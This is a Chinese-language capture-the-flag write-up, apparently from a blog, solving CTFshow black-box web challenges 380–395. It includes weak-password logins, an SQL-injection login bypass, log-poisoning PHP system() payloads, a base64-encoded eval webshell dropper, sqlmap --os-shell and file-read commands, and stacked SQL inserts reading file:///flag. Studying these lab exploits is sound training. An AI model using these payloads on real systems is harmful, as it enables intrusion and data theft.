CTFshow黑盒测试刷题

web380

先扫目录

打开

报错了

先用伪协议去查看源码

之前扫到有flag.php

访问一下

就得到flag了

web381

查看一下源码

点击第三个css

藏在目录里面

web382

跟上题一样

不过访问这个页面是一个登录框

试一下弱口令

最后是admin

admin888

就进去了

web383

进入这个后台

用万能密码

admin' or 1=1#..

就可以进去了

web384

提示

密码前2位是小写字母,后三位是数字

用脚本生成一个字典

再用BP爆破一下

admin

xy123

web385

扫目录

访问一下

访问install/?install

默认密码是:

admin

admin888

再访问一下后台进去就行了

web386

构造payload

/clear.php?file=./install/lock.dat

清理掉之后跟上题一样

admin

admin888

就可以了

web387

扫目录,找到

/robots.txt

访问一下

/debug

file传参找到目录

/debug?file=/var/log/nginx/access.log

找到日志

<?php system('ls / >/var/www/html/1.txt');?>

rce执行一下

再访问一下

找到了目录

查看

找到文件

查看这个文件的源码

<?php system('cat /var/www/html/alsckdfy/check.php >/var/www/html/1.txt');?>

就找到flag了

web388

目录扫到有编辑器

上传一个文件

文件内容:

<?php 
system('echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==" | base64 -d > /var/www/html/shell.php');
?>

file传个路径上去

在跟上文件地址

显示已上传shell文件

查看目录

查看文件内容

源码中找到flag

web389

首先显示权限不足

cookies改权限

之后就和上题一样了

web390

sqlmap -u https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1 --os-shell

就得到了flag

sqlmap -u https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1 --file-read /var/www/html/alsckdfy/check.php --batch

直接读取文件也行

web391

sqlmap -u https://8a018f60-20e9-4879-a24c-ec147c0e5a23.challenge.ctf.show/search.php?title=1 --os-shell

这题是这个输入框有sql注入漏洞

web392

和上题一样

sqlmap -u https://482a803a-36ed-45aa-b1f4-503b856dff17.challenge.ctf.show/search.php?title=1 --os-shell

不一样的是这题直接查看flag

web393

找了半天还是搜索框存在注入

https://4f174420-01b7-4271-bf73-a5f71f243eb8.challenge.ctf.show/search.php?title=1

不过这一次--os-shell跑不出来

直接--dbs

-D ctfshow -T link --columns找到

search.php?title=1';insert into link values (11,'a','file:///flag');#

然后访问link.php?id=11

得到flag

web394

前面同上

只不过加了过滤

search.php?title=1';insert into link values (11,'a','66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870');#

之后访问link.php?id=10

源码发现flag

web395

同上

相关推荐
一只鹿鹿鹿1 小时前
IT程序设计文档,软件需求设计文档,详细设计模板(Word原件)
开发语言·数据库·安全·需求分析·设计规范
步、步、为营2 小时前
.Net WebApi 中的Token参数校验
网络·安全·.net
用户47049825641833 小时前
湘岚杯 部分题目WriteUp
安全
内心如初4 小时前
JAVA-Exploit编写(7)--http-request库文件上传使用续篇
java·网络安全·exploit
几维安全6 小时前
2025年应用与API安全展望:挑战与机遇并存
安全
w2830656 小时前
网络安全(渗透)
安全·web安全
万亿少女的梦1689 小时前
基于PHP的校园兼职系统的设计与开发
开发语言·网络·数据库·爬虫·网络安全·php
江池俊9 小时前
高效安全文件传输新选择!群晖NAS如何实现无公网IP下的SFTP远程连接
java·tcp/ip·安全
互联网安全研究院9 小时前
2025年供应链攻击或成企业主要威胁
运维·网络·安全
打码人的日常分享10 小时前
【软件开发过程管理规范】需求管理,需求分析,设计开发管理,测试管理(Word)
web安全·自动化·需求分析·规格说明书